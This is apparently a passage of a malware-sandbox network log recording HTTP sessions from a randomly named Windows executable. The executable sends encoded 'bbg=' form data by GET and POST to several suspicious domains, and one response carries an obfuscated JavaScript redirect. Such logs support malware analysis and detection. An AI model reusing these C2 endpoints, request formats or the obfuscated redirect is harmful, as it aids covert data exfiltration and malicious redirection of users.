                                                                                      Content-Length: 1240
                                                                                      Referer: http://www.d48dk.top/9ffw/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Raw: 62 62 67 3d 67 43 79 41 61 63 33 46 4d 39 4b 68 5a 6f 73 30 70 4e 75 4f 41 4c 5a 59 71 54 6b 49 32 32 46 42 33 4e 34 6e 78 59 75 38 49 68 37 61 73 2b 52 4a 36 45 52 4f 51 71 61 36 4e 6f 50 4d 72 4c 71 67 72 31 56 2b 51 55 70 76 49 45 41 76 31 6d 30 38 53 38 56 6d 52 6d 6d 57 35 4a 47 65 65 77 6e 37 36 74 33 78 61 68 6d 45 63 52 32 32 4f 6a 33 63 46 79 65 4e 6d 56 51 2b 30 75 32 50 38 47 38 48 6a 43 6a 7a 78 79 4e 67 58 44 71 56 50 4a 4a 6f 63 74 44 45 6d 41 56 51 71 6e 76 4d 33 50 6a 49 51 65 53 59 33 73 47 68 43 4d 42 39 6d 56 51 41 6b 4b 31 66 71 43 5a 69 52 30 36 69 55 71 79 6f 4b 72 31 61 6e 53 65 63 39 37 5a 6d 67 6f 51 41 46 4f 34 66 76 78 4d 74 71 6e 6f 58 62 63 54 64 74 58 55 2b 35 2b 51 37 4a 41 65 33 71 78 32 74 56 4c 66 32 6c 33 45 50 35 63 62 75 6f 5a 39 67 36 68 59 59 67 65 4f 58 6c 70 61 59 6c 30 7a 57 65 63 6a 35 50 32 31 51 4b 65 45 6a 42 6f 71 6a 57 71 74 33 46 4b 64 78 63 42 36 65 74 6a 79 38 2b 6b 70 36 39 38 46 74 38 73 4b 43 6f 76 48 74 7a 43 57 6f 5a 33 49 36 49 6d 79 65 44 52 [TRUNCATED]
                                                                                      Data Ascii: bbg=gCyAac3FM9KhZos0pNuOALZYqTkI22FB3N4nxYu8Ih7as+RJ6EROQqa6NoPMrLqgr1V+QUpvIEAv1m08S8VmRmmW5JGeewn76t3xahmEcR22Oj3cFyeNmVQ+0u2P8G8HjCjzxyNgXDqVPJJoctDEmAVQqnvM3PjIQeSY3sGhCMB9mVQAkK1fqCZiR06iUqyoKr1anSec97ZmgoQAFO4fvxMtqnoXbcTdtXU+5+Q7JAe3qx2tVLf2l3EP5cbuoZ9g6hYYgeOXlpaYl0zWecj5P21QKeEjBoqjWqt3FKdxcB6etjy8+kp698Ft8sKCovHtzCWoZ3I6ImyeDRfe5TFBxLXjcsr0Z1sRC8jUv83kJa4kkYaBEeiwJiX6bMAMQFezHlebwvjZ/9p1fMEmkisOMGP5PLAjKvAB62QSUCmvLznXiIA1bTEui4vRBgeh3VUp2Ctpu/w1mIi4QctgFpUeKzS+/Lt1fboZWifRL8km5zwCt8+T6AOKOfl+DNZARwunJiBRrstbHBbCeK9X2CelvhFZxvfj5/JwUUg8vuqF4UN7ZcKu+GxmjZFOlQFKvwZBsMwm56JatNofU0jK1M2IH0J8H6/7q67R1ww/tHEZB1vM9mwPP+FfC4ltnGoc5OMmNRh+Sh8Nur/yc8wYSz1HR+OfxlCMx/l3kxldrxPyb0hGzd/j9YVXhbFpuBXe5gZYARHb8Ry9zR9ZunaVnIkIZFoiI4PXIXj9krntMKi8AZ+B7rZdXqnFAV1vP5OEyvqj3cQ6Ih8pSo4SKj7EDUZwpb4B8BzF0gTa+kUelPGFLm/PPmOK2W8HIRsLtnOJMlAoJ08/pYLfidhGfhUeuOXo9uUC1MuofwgKMfXZmcWnhmf2z8eQSdT4bTgkIg3BPqmOJtY6it407Onv/uTzj/O0kleKRt898dcsJv17V5kuzRFtLHAAAZ/ue9/lM8z/gjlTzsAXW4fwXNOUvXibnm+vEdXnhBW7p8bU8trOoxMafzdjYBUU [TRUNCATED]
                                                                                      Jan 10, 2025 19:52:21.667274952 CET302INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:52:21 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 138
                                                                                      Connection: close
                                                                                      ETag: "66927002-8a"
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      5192.168.2.549999154.23.184.207804680C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 19:52:23.227557898 CET520OUTGET /9ffw/?bbg=tAagZsHUdJyyT40ohv2IEKVVuTBc1VBL1ZYJ8ve7IxnIk8U1vVUcZfnPN6bfj6aG1UJ/NhZtBjoMrT4UOPB/cVOBm4LELiXS/YOPTGiXcR6tARW7Ah+E+UdM0p2Er0wI+Q==&4Hph=tXCXkpKPT HTTP/1.1
                                                                                      Host: www.d48dk.top
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Jan 10, 2025 19:52:24.180160046 CET302INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:52:24 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 138
                                                                                      Connection: close
                                                                                      ETag: "66927002-8a"
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      6192.168.2.55000138.165.29.234804680C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 19:52:29.600497007 CET786OUTPOST /d3gs/ HTTP/1.1
                                                                                      Host: www.8312zcksnu.bond
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.8312zcksnu.bond
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 204
                                                                                      Referer: http://www.8312zcksnu.bond/d3gs/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Raw: 62 62 67 3d 70 6e 69 34 35 70 76 59 4a 63 66 41 67 53 65 74 6e 4c 61 67 4f 78 5a 70 2f 32 6b 66 6d 59 49 37 52 6f 6d 74 43 38 4f 32 63 72 45 78 50 67 72 58 58 71 47 32 72 74 37 6e 39 68 5a 6f 47 74 76 50 72 64 44 62 56 38 7a 35 41 4d 58 69 6f 36 50 64 34 61 49 66 45 34 46 4c 61 53 56 4f 70 33 6f 68 47 31 4f 47 77 47 41 57 6d 42 45 55 46 4a 32 57 75 6b 6f 57 6c 32 33 63 6f 76 6e 72 44 35 6c 65 52 39 71 4e 45 4e 38 64 48 37 2f 73 6f 68 5a 33 78 62 74 39 51 2b 39 6a 37 62 4c 75 37 49 42 6c 65 6e 32 6e 76 41 71 43 6b 78 4f 70 53 78 79 73 53 53 6e 57 7a 70 46 4d 6f 30 75 33 70 45 69 55 42 37 61 49 70 79 51 3d
                                                                                      Data Ascii: bbg=pni45pvYJcfAgSetnLagOxZp/2kfmYI7RomtC8O2crExPgrXXqG2rt7n9hZoGtvPrdDbV8z5AMXio6Pd4aIfE4FLaSVOp3ohG1OGwGAWmBEUFJ2WukoWl23covnrD5leR9qNEN8dH7/sohZ3xbt9Q+9j7bLu7IBlen2nvAqCkxOpSxysSSnWzpFMo0u3pEiUB7aIpyQ=


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      7192.168.2.55000238.165.29.234804680C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 19:52:32.153207064 CET806OUTPOST /d3gs/ HTTP/1.1
                                                                                      Host: www.8312zcksnu.bond
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.8312zcksnu.bond
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 224
                                                                                      Referer: http://www.8312zcksnu.bond/d3gs/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Raw: 62 62 67 3d 70 6e 69 34 35 70 76 59 4a 63 66 41 6a 79 75 74 6c 73 75 67 47 78 5a 6d 6d 47 6b 66 76 34 49 2f 52 6f 61 74 43 39 36 6d 63 59 67 78 4f 41 62 58 57 76 6d 32 73 74 37 6e 7a 42 5a 70 43 74 76 51 72 64 50 70 56 2b 6e 35 41 4d 72 69 6f 34 58 64 34 70 51 63 57 59 46 4a 53 79 56 51 6a 58 6f 68 47 31 4f 47 77 47 55 76 6d 48 73 55 46 36 75 57 30 47 4d 4a 2b 57 33 66 76 76 6e 72 48 35 6c 61 52 39 72 59 45 50 49 33 48 35 48 73 6f 6c 64 33 78 71 74 2b 66 2b 39 6c 6c 72 4c 39 38 35 6b 54 58 6b 4f 32 31 6d 6a 41 33 33 43 79 65 6e 44 47 49 77 76 2b 67 4a 70 30 34 6e 6d 41 34 30 44 39 62 59 4b 34 33 6c 47 4d 52 69 48 52 66 57 6b 34 49 4c 42 47 5a 58 59 44 74 6b 4e 47
                                                                                      Data Ascii: bbg=pni45pvYJcfAjyutlsugGxZmmGkfv4I/RoatC96mcYgxOAbXWvm2st7nzBZpCtvQrdPpV+n5AMrio4Xd4pQcWYFJSyVQjXohG1OGwGUvmHsUF6uW0GMJ+W3fvvnrH5laR9rYEPI3H5Hsold3xqt+f+9llrL985kTXkO21mjA33CyenDGIwv+gJp04nmA40D9bYK43lGMRiHRfWk4ILBGZXYDtkNG


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      8192.168.2.55000338.165.29.234804680C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 19:52:34.703620911 CET1823OUTPOST /d3gs/ HTTP/1.1
                                                                                      Host: www.8312zcksnu.bond
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.8312zcksnu.bond
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 1240
                                                                                      Referer: http://www.8312zcksnu.bond/d3gs/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Raw: 62 62 67 3d 70 6e 69 34 35 70 76 59 4a 63 66 41 6a 79 75 74 6c 73 75 67 47 78 5a 6d 6d 47 6b 66 76 34 49 2f 52 6f 61 74 43 39 36 6d 63 59 6f 78 50 79 54 58 57 4a 75 32 74 74 37 6e 73 78 5a 6b 43 74 76 64 72 64 6e 74 56 2b 72 70 41 4a 76 69 70 62 66 64 76 4d 6b 63 64 59 46 4a 65 53 56 52 70 33 6f 34 47 31 65 43 77 47 45 76 6d 48 73 55 46 39 57 57 36 45 6f 4a 38 57 33 63 6f 76 6e 6e 44 35 6c 32 52 39 6a 49 45 50 4d 4e 48 6f 6e 73 72 46 4e 33 32 49 46 2b 53 2b 39 6e 6b 72 4b 67 38 35 59 41 58 6b 43 36 31 6d 2f 2b 33 77 47 79 62 57 61 4d 53 54 66 70 2b 35 45 58 79 46 69 63 74 52 7a 64 46 4a 61 7a 32 32 71 6f 53 54 50 47 4a 79 4d 62 4c 2f 34 7a 64 54 30 46 39 53 63 32 31 6b 36 68 62 73 33 73 41 59 76 71 6d 58 42 79 42 44 76 34 64 4d 61 5a 56 54 42 36 37 6a 6a 39 79 58 4f 55 4f 6e 31 45 77 37 67 64 6b 54 61 33 48 37 54 2f 6d 48 66 74 2b 6b 75 59 35 51 70 2f 34 69 59 79 69 4e 4c 49 47 42 46 65 6a 36 56 33 34 6e 48 2b 6c 62 67 6f 56 41 6d 4b 4e 6d 54 4d 46 39 68 69 6f 61 65 45 36 6c 79 6a 79 4a 4e 36 56 57 [TRUNCATED]
                                                                                      Data Ascii: bbg=pni45pvYJcfAjyutlsugGxZmmGkfv4I/RoatC96mcYoxPyTXWJu2tt7nsxZkCtvdrdntV+rpAJvipbfdvMkcdYFJeSVRp3o4G1eCwGEvmHsUF9WW6EoJ8W3covnnD5l2R9jIEPMNHonsrFN32IF+S+9nkrKg85YAXkC61m/+3wGybWaMSTfp+5EXyFictRzdFJaz22qoSTPGJyMbL/4zdT0F9Sc21k6hbs3sAYvqmXByBDv4dMaZVTB67jj9yXOUOn1Ew7gdkTa3H7T/mHft+kuY5Qp/4iYyiNLIGBFej6V34nH+lbgoVAmKNmTMF9hioaeE6lyjyJN6VWOdTWnlFOpEYWt+L/b9PeQKW45ib64oeSx9AhP+nNQkUf5rHAJz2iRK+raVsszc7xmAvpdTfRrwoEDLDPYM+GusO/qhqIp+q6hqdwMU7Io70UcXR73oGE4Y2wkAQEt22OgaW0g0qiMlyhsriPzzuY/LjVL8FJtKwNRiMbGvRbvH0P/TMdRNSsLB5rSdPeQpxveVg/SvH1XdUILxX7FyhSZyzZaxBw74tvE0ch6svsEck60oujUr5pdqifA2wclxW5slnop1jS0/QZBWh6J50b9rCYOPxRpR6L4lU50K9bjh01c88AOaEP4+Pc0Gvyzln+t58oUFjsZt5iBF4YjL2qK5CaimoxXa4oRmu2qkn6HLRtO+nF+s3KZyMNeXDDDsXFZ/zlyeWzcbZde0YR2TsNzWIO6/eXaBY4ryfh2O4DGPFsPEOQ6IRbGZilD0qKClrFNDozvn7lryuFl5j1AMhKPzV6gNLfCUW5VIWQZD5z4ZAEXSuMSciWZCMBrqVVVCD1zpuEmeG4tzkTbIplDkvhxYM5jqq1/hV1bGXmSANsxwMmq0gR+POkFbRX+bWUDgcv29vmeuISKuYNHnO3I/zqh2BqI1DPxja6O+T8MqB5dDrtdJBnMNVwB4JD1TIYSmODNEh0ZydZTHJGa/Qb2vAQ449PvtwWLu6clm [TRUNCATED]


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      9192.168.2.55000438.165.29.234804680C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 19:52:37.247426987 CET526OUTGET /d3gs/?4Hph=tXCXkpKPT&bbg=klKY6dvkP+O30B+HpvvIDDpax0dTsaw1cNmHC/CObJBnEjCTb6SXj4/f8yRqIefmit/6AMXcJNK+4aPls5ALe658TBhWz2YaAyzI8Rgx/2lRGZqP2V4f93z8nfndcdsgJQ== HTTP/1.1
                                                                                      Host: www.8312zcksnu.bond
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Jan 10, 2025 19:52:38.717694044 CET856INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:52:38 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Vary: Accept-Encoding
                                                                                      Data Raw: 32 39 37 0d 0a 3c 73 63 72 69 70 74 3e 0a 76 61 72 20 5f 68 6d 74 20 3d 20 5f 68 6d 74 20 7c 7c 20 5b 5d 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 76 61 72 20 68 6d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0a 20 20 68 6d 2e 73 72 63 20 3d 20 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 31 64 61 35 39 31 61 66 32 66 66 31 31 33 38 66 65 39 61 35 31 35 64 63 33 33 65 62 35 62 66 37 22 3b 0a 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 20 0a 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 68 6d 2c 20 73 29 3b 0a 7d 29 28 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 31 2d 2d 3e 0a 3c 73 63 72 69 70 74 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 69 64 3d 22 4c 41 5f 43 4f 4c 4c 45 43 54 22 20 73 72 63 3d 22 2f 2f 73 64 6b 2e 35 [TRUNCATED]
                                                                                      Data Ascii: 297<script>var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?1da591af2ff1138fe9a515dc33eb5bf7"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script>...1--><script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script><script>LA.init({id:"KQ2cxFS69unN6J8D",ck:"KQ2cxFS69unN6J8D"})</script><script> var url = "https://djwe.bekru.wgljk.cn/123.html"; var _0x0 = ["\x6C\x6F\x63\x61\x74\x69\x6F\x6E", "\x68\x72\x65\x66"]; setTimeout(function() { window[_0x0[0]][_0x0[1]] = url; }, 0);</script>0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      10192.168.2.55000613.248.169.48804680C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 19:52:43.779007912 CET768OUTPOST /4nyz/ HTTP/1.1
                                                                                      Host: www.snyp.shop
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.snyp.shop
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 204
                                                                                      Referer: http://www.snyp.shop/4nyz/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Raw: 62 62 67 3d 57 65 6b 66 4b 6e 6a 4a 43 77 70 56 4e 52 6f 68 66 4b 6a 7a 77 59 44 47 6d 6c 46 78 72 7a 43 30 62 73 69 4b 31 4c 35 4d 72 4e 63 51 6a 53 67 54 51 4a 58 44 41 6f 79 51 34 35 67 2b 48 52 55 65 4b 36 38 6e 4d 79 4b 4a 49 65 4e 57 48 48 31 71 63 53 6c 59 66 6e 38 62 6c 50 33 4e 45 70 51 52 37 44 55 65 62 78 48 43 57 4a 48 76 61 49 35 32 39 2f 67 6c 41 2b 32 34 78 48 5a 44 70 4b 33 71 55 53 39 79 56 63 46 58 37 7a 42 4b 6f 2b 76 6f 32 58 44 6a 36 39 69 41 69 63 2f 6d 47 73 53 51 67 6d 52 6c 4b 33 73 37 43 32 64 57 69 31 61 2f 78 39 6c 51 75 4e 30 43 68 51 59 63 73 53 35 51 6c 71 50 72 7a 52 30 3d
                                                                                      Data Ascii: bbg=WekfKnjJCwpVNRohfKjzwYDGmlFxrzC0bsiK1L5MrNcQjSgTQJXDAoyQ45g+HRUeK68nMyKJIeNWHH1qcSlYfn8blP3NEpQR7DUebxHCWJHvaI529/glA+24xHZDpK3qUS9yVcFX7zBKo+vo2XDj69iAic/mGsSQgmRlK3s7C2dWi1a/x9lQuN0ChQYcsS5QlqPrzR0=
                                                                                      Jan 10, 2025 19:52:44.231848955 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                      content-length: 0
                                                                                      connection: close


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      11192.168.2.55000713.248.169.48804680C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 19:52:46.327354908 CET788OUTPOST /4nyz/ HTTP/1.1
                                                                                      Host: www.snyp.shop
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.snyp.shop
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 224
                                                                                      Referer: http://www.snyp.shop/4nyz/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Raw: 62 62 67 3d 57 65 6b 66 4b 6e 6a 4a 43 77 70 56 66 69 77 68 64 74 33 7a 6e 6f 44 4a 70 46 46 78 6c 54 43 77 62 73 75 4b 31 50 68 63 72 2f 34 51 6a 77 6f 54 52 4e 4c 44 44 6f 79 51 77 5a 67 33 59 68 55 4a 4b 36 78 51 4d 7a 47 4a 49 59 68 57 48 43 52 71 63 6c 78 62 66 33 38 64 74 76 33 4c 41 70 51 52 37 44 55 65 62 78 69 58 57 4a 66 76 5a 34 4a 32 38 65 67 6d 62 65 32 37 32 48 5a 44 6a 71 33 32 55 53 39 41 56 5a 35 78 37 78 4a 4b 6f 2b 66 6f 32 46 72 38 30 39 69 4f 2f 4d 2b 66 4a 4d 58 67 6e 30 4a 76 4f 6b 52 79 53 56 52 69 6a 44 72 56 72 66 74 34 39 74 59 36 78 44 51 72 39 69 59 35 2f 4a 66 62 74 47 6a 43 42 44 51 33 46 34 2b 35 6a 49 58 70 49 74 78 69 49 77 54 74
                                                                                      Data Ascii: bbg=WekfKnjJCwpVfiwhdt3znoDJpFFxlTCwbsuK1Phcr/4QjwoTRNLDDoyQwZg3YhUJK6xQMzGJIYhWHCRqclxbf38dtv3LApQR7DUebxiXWJfvZ4J28egmbe272HZDjq32US9AVZ5x7xJKo+fo2Fr809iO/M+fJMXgn0JvOkRySVRijDrVrft49tY6xDQr9iY5/JfbtGjCBDQ3F4+5jIXpItxiIwTt
                                                                                      Jan 10, 2025 19:52:46.767559052 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                      content-length: 0
                                                                                      connection: close


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      12192.168.2.55000813.248.169.48804680C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Jan 10, 2025 19:52:48.874629021 CET1805OUTPOST /4nyz/ HTTP/1.1
                                                                                      Host: www.snyp.shop
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.snyp.shop
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 1240
                                                                                      Referer: http://www.snyp.shop/4nyz/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Raw: 62 62 67 3d 57 65 6b 66 4b 6e 6a 4a 43 77 70 56 66 69 77 68 64 74 33 7a 6e 6f 44 4a 70 46 46 78 6c 54 43 77 62 73 75 4b 31 50 68 63 72 2f 77 51 6a 46 38 54 52 71 2f 44 43 6f 79 51 78 5a 67 79 59 68 55 49 4b 36 70 55 4d 7a 62 72 49 64 39 57 42 55 64 71 65 58 4a 62 47 48 38 64 68 50 33 4f 45 70 52 46 37 44 45 53 62 78 79 58 57 4a 66 76 5a 2b 4e 32 31 76 67 6d 5a 65 32 34 78 48 5a 66 70 4b 33 53 55 53 6c 36 56 59 4e 48 36 41 70 4b 6f 61 37 6f 37 57 44 38 72 74 69 4d 38 4d 2b 75 4a 4e 72 2f 6e 30 46 46 4f 6c 31 59 53 56 5a 69 75 33 32 57 32 37 78 66 2f 4e 31 57 69 42 55 4b 67 48 77 61 68 49 72 7a 71 6c 48 48 46 53 59 44 47 4e 2f 35 68 63 53 45 4c 5a 67 31 50 45 33 6d 34 6e 34 45 65 4a 62 44 6b 4d 78 69 30 6d 41 30 30 32 39 77 39 46 6f 2b 74 37 77 78 35 43 55 48 4b 55 33 39 7a 70 6c 69 31 6c 57 57 30 74 2f 56 46 64 5a 4a 4f 34 6a 35 42 48 4b 4f 71 45 36 4f 51 50 2f 42 54 56 43 33 75 56 53 62 71 6f 43 33 64 6c 78 50 69 63 53 33 54 62 5a 65 6a 69 55 38 61 67 6d 41 65 2f 62 48 4f 64 4c 63 78 4c 61 59 56 43 [TRUNCATED]
